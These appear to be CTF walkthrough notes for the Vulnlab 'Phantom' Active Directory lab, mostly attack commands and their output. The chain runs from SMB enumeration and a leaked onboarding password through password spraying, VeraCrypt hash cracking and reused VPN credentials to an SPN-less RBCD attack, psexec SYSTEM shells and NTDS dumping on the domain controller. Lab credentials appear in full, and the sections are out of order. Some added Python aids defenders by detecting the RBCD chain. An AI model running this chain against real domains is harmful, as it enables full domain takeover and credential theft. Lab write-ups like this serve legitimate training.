Here are my notes on the PHANTOM box from Vulnlab, which was also deployed to HackTheBox.
PHANTOM: 10.10.99.223
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
- Nothing interesting in the BloodHound data for the ibryant user.
Resource-based constrained delegation (RBCD), SPN-less:
BloodHound Data on svc_sspr:
SVC_SSPR -> ForceChangePassword -> RNICHOLS && WSILVA && CROSE
All three of these users have AddAllowedToAct -> DC.PHANTOM.VL
#We are going to pick WSILVA:
net rpc password "WSILVA" 'Admin123!' -U phantom.vl/svc_sspr%gB6XTcqVP5MlP7Rc -S phantom.vl
impacket-rbcd -delegate-from 'wsilva' -delegate-to 'DC$' -dc-ip '10.10.99.223' -action 'write' 'phantom.vl'/'wsilva':'Admin123!'
getTGT.py -hashes :$(pypykatz crypto nt 'Admin123!') 'phantom.vl'/'wsilva'
export KRB5CCNAME='wsilva.ccache'
describeTicket.py 'wsilva.ccache' | grep 'Ticket Session Key'
[*] Ticket Session Key : 168335580e1be67575150eefcffb6469
changepasswd.py -newhashes :168335580e1be67575150eefcffb6469 'phantom.vl'/'wsilva':'Admin123!'@'phantom.vl'
getST.py -k -no-pass -u2u -impersonate "Administrator" -spn "cifs/DC.phantom.vl" 'phantom.vl'/'wsilva'
getST.py -k -no-pass -u2u -impersonate "Administrator" -spn "host/DC.phantom.vl" 'phantom.vl'/'wsilva'
export KRB5CCNAME=Administrator@cifs_DC.phantom.vl@PHANTOM.VL.ccache
crackmapexec smb dc.phantom.vl --use-kcache --ntds
sudo rlwrap psexec.py dc.phantom.vl -k
┌──(root㉿kali)-[/home/kali/VL/PHANTOM/10.10.99.223]
└─# sudo rlwrap psexec.py dc.phantom.vl -k
Impacket v0.13.0.dev0+20241024.90011.835e1755 - Copyright Fortra, LLC and its affiliated companies
[*] Requesting shares on dc.phantom.vl.....
[*] Found writable share ADMIN$
[*] Uploading file OymjUhBG.exe
[*] Opening SVCManager on dc.phantom.vl.....
[*] Creating service jvaz on dc.phantom.vl.....
[*] Starting service jvaz.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.20348.2527]
(c) Microsoft Corporation. All rights reserved.
C:\Windows\system32> whoami
nt authority\system
C:\Windows\system32> hostname
DC
SYSTEM-SHELL !
https://medium.com/@bericontraster/phantom-vulnlab-full-walkthrough-tjnull-list-23dcf429a287
https://medium.com/@arz101/vulnlab-phantom-3c4b4da492d9
C:\Users\Administrator\Desktop> whoami
nt authority\system
C:\Users\Administrator\Desktop> hostname
DC
C:\Users\Administrator\Desktop> dir
Volume in drive C has no label.
Volume Serial Number is BAA2-45C4
Directory of C:\Users\Administrator\Desktop
07/06/2024 10:55 AM <DIR> .
07/06/2024 10:55 AM <DIR> ..
07/04/2024 06:22 AM 2,308 Microsoft Edge.lnk
07/06/2024 10:57 AM 36 root.txt
2 File(s) 2,344 bytes
2 Dir(s) 8,436,060,160 bytes free
C:\Users\Administrator\Desktop> type root.txt
VL{REDIRECTED}
ROOT.TXT: VL{REDIRECTED}
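From the defender's side, the chain above (a forced password reset of wsilva, then a write of msDS-AllowedToActOnBehalfOfOtherIdentity on the DC computer object) leaves a trail in Windows Security events 4724 (password reset attempt) and 5136 (directory service object modified). The following is an added example of detection logic over constructed sample events, not code from the page, Vulnlab or any tool used above; event field names are simplified assumptions.

```python
from datetime import datetime, timedelta

RBCD_ATTR = "msDS-AllowedToActOnBehalfOfOtherIdentity"

# Constructed sample events (not real logs from the box). The fields mirror
# Security events 4724 and 5136 as they would look for the chain in the notes.
EVENTS = [
    {"id": 4724, "time": "2024-11-15T16:20:01", "subject": "svc_sspr", "target": "wsilva"},
    {"id": 4724, "time": "2024-11-15T09:10:00", "subject": "Administrator", "target": "Administrator"},
    {"id": 5136, "time": "2024-11-15T16:24:30", "subject": "wsilva",
     "object_dn": "CN=DC,OU=Domain Controllers,DC=phantom,DC=vl",
     "attribute": RBCD_ATTR, "operation": "Value Added"},
    {"id": 5136, "time": "2024-11-15T11:00:00", "subject": "Administrator",
     "object_dn": "CN=WS01,CN=Computers,DC=phantom,DC=vl",
     "attribute": "description", "operation": "Value Added"},
]


def detect_rbcd_chain(events, window=timedelta(hours=1)):
    """Return (severity, message) findings.

    A password reset performed by a different account is medium on its own;
    an RBCD attribute write on a domain controller object is high; when the
    writer's own password was force-reset by someone else inside `window`,
    the two are correlated into a single critical finding.
    """
    findings, forced_resets = [], {}
    for e in sorted(events, key=lambda ev: ev["time"]):
        ts = datetime.fromisoformat(e["time"])
        if e["id"] == 4724 and e["subject"].lower() != e["target"].lower():
            forced_resets[e["target"].lower()] = (ts, e["subject"])
            findings.append(("medium", f"{e['subject']} reset the password of {e['target']}"))
        elif e["id"] == 5136 and e["attribute"] == RBCD_ATTR:
            sev = "high" if "OU=Domain Controllers" in e["object_dn"] else "medium"
            msg = f"{e['subject']} wrote {RBCD_ATTR} on {e['object_dn']}"
            prior = forced_resets.get(e["subject"].lower())
            if prior and ts - prior[0] <= window:
                sev, msg = "critical", msg + f" after a forced reset by {prior[1]}"
            findings.append((sev, msg))
    return findings


if __name__ == "__main__":
    for severity, message in detect_rbcd_chain(EVENTS):
        print(f"[{severity}] {message}")
```

Event 5136 is only generated when Directory Service Changes auditing is enabled and the computer object's SACL audits writes to that attribute, so check the audit policy before relying on this.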
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-11-15 16:09:40Z)
- No AS-REP roasting - nope!
- No Kerberoasting - nope!
135/tcp open msrpc Microsoft Windows RPC
┌──(root㉿kali)-[/home/kali/VL/PHANTOM/10.10.99.223]
└─# rpcclient 10.10.99.223 -U "guest%guest" -c "enumdomusers;quit"
Cannot connect to server. Error was NT_STATUS_LOGON_FAILURE
┌──(root㉿kali)-[/home/kali/VL/PHANTOM/10.10.99.223]
└─# rpcclient 10.10.99.223 -U "" -c "enumdomusers;quit"
Password for [WORKGROUP\]:
result was NT_STATUS_ACCESS_DENIED
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: phantom.vl0., Site: Default-First-Site-Name)
- An account is required, otherwise don't bother!
phantom.vl\ibryant:Ph4nt0m@5t4rt!
ldapsearch -H ldap://10.10.99.223 -x -W -D "ibryant@phantom.vl" -b "dc=phantom,dc=vl" '(objectClass=person)' > ldap-people
- Nothing interesting: no password disclosure and no interesting descriptions.
- ibryant is a member of the IT group.
445/tcp open microsoft-ds?
┌──(root㉿kali)-[/home/kali/VL/PHANTOM/10.10.99.223]
└─# smbmap -u "Guest" -p "" -P 445 -H 10.10.99.223
SMBMap - Samba Share Enumerator v1.10.4 | Shawn Evans - ShawnDEvans@gmail.com
https://github.com/ShawnDEvans/smbmap
[*] Detected 1 hosts serving SMB
[*] Established 1 SMB connections(s) and 1 authenticated session(s)
[+] IP: 10.10.99.223:445 Name: 10.10.99.223 Status: Authenticated
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
Departments Share NO ACCESS
IPC$ READ ONLY Remote IPC
NETLOGON NO ACCESS Logon server share
Public READ ONLY
SYSVOL NO ACCESS Logon server share
[*] Closed 1 connections
sudo lookupsid.py Guest@10.10.99.223 | tee usernames
grep SidTypeUser usernames | awk '{print $2}' | cut -d "\\" -f2 > users.txt
┌──(root㉿kali)-[/home/kali/VL/PHANTOM/10.10.99.223]
└─# smbclient \\\\10.10.99.223\\Public -U ""
Password for [WORKGROUP\]:
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Thu Jul 11 11:03:14 2024
.. DHS 0 Sun Jul 7 04:39:30 2024
tech_support_email.eml A 14565 Sat Jul 6 12:08:43 2024 #Interesting.
6127103 blocks of size 4096. 1206699 blocks available
smb: \> get tech_support_email.eml
getting file \tech_support_email.eml of size 14565 as tech_support_email.eml (25.1 KiloBytes/sec) (average 25.1 KiloBytes/sec)
smb: \> exit
┌──(root㉿kali)-[/home/kali/VL/PHANTOM/10.10.99.223]
└─# ls
nmap nmapAutomator_10.10.99.223_All.txt recon tech_support_email.eml usernames users.txt
tech_support_email.eml:
Content-Type: multipart/mixed; boundary="===============6932979162079994354=="
MIME-Version: 1.0
From: alucas@phantom.vl
To: techsupport@phantom.vl
Date: Sat, 06 Jul 2024 12:02:39 -0000
Subject: New Welcome Email Template for New Employees
--===============6932979162079994354==
Content-Type: text/plain; charset="us-ascii"
MIME-Version: 1.0
Content-Transfer-Encoding: 7bit
Dear Tech Support Team,
I have finished the new welcome email template for onboarding new employees.
Please find attached the example template. Kindly start using this template for all new employees.
Best regards,
Anthony Lucas
--===============6932979162079994354==
Content-Type: application/pdf
MIME-Version: 1.0
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="welcome_template.pdf"
JVBERi0xLjcKJcOkw7zDtsOfCjIgMCBvYmoKPDwvTGVuZ3RoIDMgMCBSL0ZpbHRlci9GbGF0ZURl
Y29kZT4+CnN0cmVhbQp4nI1Vy4rcMBC8+yt0zsFTXZYsGcyAJY8hgT0sGcgh5LBksyE5LGRYyO+H
bnsfM7OeyckvSdVV1dVGLe5vtRkOT78e7r4/uXxTqj8ODjWYXCtSd1Fc7Obr4Uf15YN7rHY3pdp8
[SNIP]
[Base64 ENCODED]
Take that base64-encoded attachment, decode it into a PDF, then convert it to a text file:
┌──(root㉿kali)-[/home/kali/VL/PHANTOM/10.10.99.223]
└─# base64 -d tech_support_email.eml > output.pdf
┌──(root㉿kali)-[/home/kali/VL/PHANTOM/10.10.99.223]
└─# pdftotext output.pdf > output.txt
┌──(root㉿kali)-[/home/kali/VL/PHANTOM/10.10.99.223]
└─# cat output.txt
Welcome to Phantom!
Dear <NAME>
We are excited to have you on board.
Below are your user credentials:
Username: <USERNAME>
Password: Ph4nt0m@5t4rt!
Please log in to your account using these credentials. For security reasons, we strongly
recommend that you change your password immediately after your first login.
If you have any questions or need assistance, feel free to reach out to our support team at
techsupport@phantom.vl
Best regards,
The Phantom Team
Password: Ph4nt0m@5t4rt!
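The manual base64/pdftotext steps above can be done properly with a MIME parser, which also handles several attachments and checks that the decoded bytes are what the header claims. This is an added example, not code from the page or the box; the message below is a constructed stand-in for tech_support_email.eml and its "PDF" is a placeholder byte string.

```python
import base64
import email
import re
from email import policy

# Constructed sample: same layout as the page's .eml, placeholder attachment bytes.
FAKE_PDF = b"%PDF-1.7\n% constructed placeholder, not a real document\n"
SAMPLE_EML = (
    'Content-Type: multipart/mixed; boundary="BOUNDARY"\n'
    "MIME-Version: 1.0\nFrom: alucas@phantom.vl\nTo: techsupport@phantom.vl\n"
    "Subject: New Welcome Email Template for New Employees\n\n"
    '--BOUNDARY\nContent-Type: text/plain; charset="us-ascii"\n\n'
    "Dear Tech Support Team,\nPlease find attached the example template.\n"
    "--BOUNDARY\nContent-Type: application/pdf\n"
    "Content-Transfer-Encoding: base64\n"
    'Content-Disposition: attachment; filename="welcome_template.pdf"\n\n'
    + base64.b64encode(FAKE_PDF).decode() + "\n--BOUNDARY--\n"
)

# Magic bytes used to sniff the real file type of a decoded attachment.
MAGIC = {b"%PDF": "pdf", b"PK\x03\x04": "zip/office", b"MZ": "pe executable"}


def extract_attachments(eml_text):
    """Return [(filename, declared_type, sniffed_type, bytes)] for each attachment."""
    msg = email.message_from_string(eml_text, policy=policy.default)
    out = []
    for part in msg.iter_attachments():
        data = part.get_payload(decode=True)  # undoes base64 / quoted-printable
        sniffed = next((t for m, t in MAGIC.items() if data.startswith(m)), "unknown")
        out.append((part.get_filename(), part.get_content_type(), sniffed, data))
    return out


# Matches lines such as "Password: Ph4nt0m@5t4rt!" in text extracted from an attachment.
CRED_RE = re.compile(r"(?im)^\s*(?:password|passwd|pwd)\s*[:=]\s*(\S+)")


def find_credentials(text):
    """Return password values found on 'Password: ...' style lines (e.g. pdftotext output)."""
    return CRED_RE.findall(text)


if __name__ == "__main__":
    for name, declared, sniffed, data in extract_attachments(SAMPLE_EML):
        print(f"{name}: declared {declared}, sniffed {sniffed}, {len(data)} bytes")
```

Run find_credentials over the pdftotext output of the real attachment to flag onboarding templates that ship a shared starting password.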
Spray the users with this password as usual:
┌──(root㉿kali)-[/home/kali/VL/PHANTOM/10.10.99.223]
└─# crackmapexec smb 10.10.99.223 -u users.txt -p 'Ph4nt0m@5t4rt!' --continue-on-success | grep "[+]"
SMB 10.10.99.223 445 DC [+] phantom.vl\ibryant:Ph4nt0m@5t4rt!
Got the creds !
phantom.vl\ibryant:Ph4nt0m@5t4rt!
┌──(root㉿kali)-[/home/kali/VL/PHANTOM/10.10.99.223]
└─# crackmapexec smb 10.10.99.223 -u ibryant -p 'Ph4nt0m@5t4rt!' --shares
SMB 10.10.99.223 445 DC [*] Windows 10.0 Build 20348 x64 (name:DC) (domain:phantom.vl) (signing:True) (SMBv1:False)
SMB 10.10.99.223 445 DC [+] phantom.vl\ibryant:Ph4nt0m@5t4rt!
SMB 10.10.99.223 445 DC [+] Enumerated shares
SMB 10.10.99.223 445 DC Share Permissions Remark
SMB 10.10.99.223 445 DC ----- ----------- ------
SMB 10.10.99.223 445 DC ADMIN$ Remote Admin
SMB 10.10.99.223 445 DC C$ Default share
SMB 10.10.99.223 445 DC Departments Share READ #Interesting.
SMB 10.10.99.223 445 DC IPC$ READ Remote IPC
SMB 10.10.99.223 445 DC NETLOGON READ Logon server share
SMB 10.10.99.223 445 DC Public READ
SMB 10.10.99.223 445 DC SYSVOL READ Logon server share # No Groups.xml, Registry.xml or any other interesting XML file.
# cd Backup
# ls
drw-rw-rw- 0 Sat Jul 6 14:04:34 2024 .
drw-rw-rw- 0 Thu Jul 11 10:59:02 2024 ..
-rw-rw-rw- 12582912 Sat Jul 6 14:04:34 2024 IT_BACKUP_201123.hc
# get IT_BACKUP_201123.hc
# exit
┌──(root㉿kali)-[/home/…/VL/PHANTOM/10.10.99.223/Department]
└─# ls
Finance HR IT IT_BACKUP_201123.hc
VeraCrypt hash cracking example: #PHANTOM-VL
└─$ cat phantom.txt
phantom
Phantom
PHANTOM
PHANT0M
phant0m
phantom.vl
PHANTOM.VL
phant0m.vl
PHANT0M.vl
Ph4nt0m
PH4NT0M
└─$ cat phantom.rule
$2 $0 $2 $3 $$
$2 $0 $2 $3 $&
$2 $0 $2 $3 $@
$2 $0 $2 $3 $!
$2 $0 $2 $3 $#
$2 $0 $2 $3 $%
$2 $0 $2 $3 $^
$2 $0 $2 $3 $*
$2 $0 $2 $3 $(
$2 $0 $2 $3 $)
$2 $0 $2 $3 $-
$2 $0 $2 $3 $_
$2 $0 $2 $3 $=
$2 $0 $2 $3 $+
# This states that each string gets the year 2023 appended, followed by one special character from a regular keyboard (or at least most of them).
hashcat -a 0 -m 13721 IT_BACKUP_201123.hc phantom.txt -r phantom.rule
IT_BACKUP_201123.hc:Phantom2023!
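To see exactly which candidates phantom.txt and phantom.rule produce (useful when auditing whether your own backup passwords follow the "company name + year + symbol" pattern), here is an added small rule engine for the hashcat rule functions used above, written for this page rather than taken from hashcat; the wordlist and rules are copied from the listing.

```python
# Wordlist and rules as in phantom.txt / phantom.rule on this page.
PHANTOM_WORDS = ["phantom", "Phantom", "PHANTOM", "PHANT0M", "phant0m",
                 "phantom.vl", "PHANTOM.VL", "phant0m.vl", "PHANT0M.vl",
                 "Ph4nt0m", "PH4NT0M"]
SPECIALS = "$&@!#%^*()-_=+"
PHANTOM_RULES = ["$2 $0 $2 $3 $" + c for c in SPECIALS]  # the 14 rules in phantom.rule


def apply_rule(rule, word):
    """Apply one hashcat-style rule to a word.

    Supported functions: ':' no-op, 'l' lowercase, 'u' uppercase, 'c' capitalise,
    'r' reverse, '$X' append X, '^X' prepend X. Spaces between functions are ignored,
    as hashcat does, so '$$' appends a literal dollar sign.
    """
    out, i = word, 0
    while i < len(rule):
        fn = rule[i]
        if fn in " :":
            pass
        elif fn == "l":
            out = out.lower()
        elif fn == "u":
            out = out.upper()
        elif fn == "c":
            out = out[:1].upper() + out[1:].lower()
        elif fn == "r":
            out = out[::-1]
        elif fn in "$^":
            i += 1  # the next character is the argument
            out = out + rule[i] if fn == "$" else rule[i] + out
        else:
            raise ValueError(f"unsupported rule function {fn!r}")
        i += 1
    return out


def expand(words, rules):
    """Deduplicated candidate list: every word run through every rule."""
    seen, out = set(), []
    for w in words:
        for r in rules:
            cand = apply_rule(r, w)
            if cand not in seen:
                seen.add(cand)
                out.append(cand)
    return out


if __name__ == "__main__":
    cands = expand(PHANTOM_WORDS, PHANTOM_RULES)
    print(len(cands), "candidates;", "Phantom2023!" in cands)
```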
How to install Veracrypt on Kali Linux
cd ~/Downloads
wget https://launchpad.net/veracrypt/trunk/1.25.9/+download/veracrypt-1.25.9-setup.tar.bz2
tar -xvf veracrypt-1.25.9-setup.tar.bz2
./veracrypt-1.25.9-setup-gui-x64
tar -xf vyos_backup.tar.gz
config/config.boot - interesting file!
[SNIP]
vpn {
sstp {
authentication {
local-users {
username lstanley {
password "gB6XTcqVP5MlP7Rc"
}
}
mode "local"
}
client-ip-pool SSTP-POOL {
range "10.0.0.2-10.0.0.100"
[SNIP]
Spray the users with the gB6XTcqVP5MlP7Rc password as usual.
┌──(root㉿kali)-[/home/kali/VL/PHANTOM/10.10.99.223]
└─# crackmapexec smb 10.10.99.223 -u users.txt -p 'gB6XTcqVP5MlP7Rc' | grep '[+]'
SMB 10.10.99.223 445 DC [+] phantom.vl\svc_sspr:gB6XTcqVP5MlP7Rc
phantom.vl\svc_sspr:gB6XTcqVP5MlP7Rc
#Credential Discovered !
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: phantom.vl0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
3389/tcp open ms-wbt-server Microsoft Terminal Services
| ssl-cert: Subject: commonName=DC.phantom.vl
| Not valid before: 2024-07-05T19:49:21
|_Not valid after: 2025-01-04T19:49:21
| rdp-ntlm-info:
| Target_Name: PHANTOM
| NetBIOS_Domain_Name: PHANTOM
| NetBIOS_Computer_Name: DC
| DNS_Domain_Name: phantom.vl
| DNS_Computer_Name: DC.phantom.vl
| Product_Version: 10.0.20348
|_ System_Time: 2024-11-15T16:09:48+00:00
|_ssl-date: 2024-11-15T16:10:28+00:00; -2s from scanner time.
5357/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Service Unavailable
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
crackmapexec winrm 10.10.99.223 -u svc_sspr -p 'gB6XTcqVP5MlP7Rc'
SMB 10.10.99.223 5985 DC [*] Windows 10.0 Build 20348 (name:DC) (domain:phantom.vl)
HTTP 10.10.99.223 5985 DC [*] http://10.10.99.223:5985/wsman
WINRM 10.10.99.223 5985 DC [+] phantom.vl\svc_sspr:gB6XTcqVP5MlP7Rc (Pwn3d!)
evil-winrm -i 10.10.99.223 -u svc_sspr -p 'gB6XTcqVP5MlP7Rc'
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\svc_sspr\Documents> whoami
phantom\svc_sspr
*Evil-WinRM* PS C:\Users\svc_sspr\Documents> hostname
DC
#USER-SHELL !
*Evil-WinRM* PS C:\Users\svc_sspr\Desktop> whoami
phantom\svc_sspr
*Evil-WinRM* PS C:\Users\svc_sspr\Desktop> hostname
DC
*Evil-WinRM* PS C:\Users\svc_sspr\Desktop> dir
Directory: C:\Users\svc_sspr\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 7/6/2024 11:58 AM 74 user.txt
*Evil-WinRM* PS C:\Users\svc_sspr\Desktop> type user.txt
VL{REDIRECTED}
USER.TXT: VL{REDIRECTED}
PRIV ESC:
# From the BloodHound data (see the RBCD notes above).
49664/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49669/tcp open msrpc Microsoft Windows RPC
49672/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49673/tcp open msrpc Microsoft Windows RPC
49679/tcp open msrpc Microsoft Windows RPC
49706/tcp open msrpc Microsoft Windows RPC
49713/tcp open msrpc Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows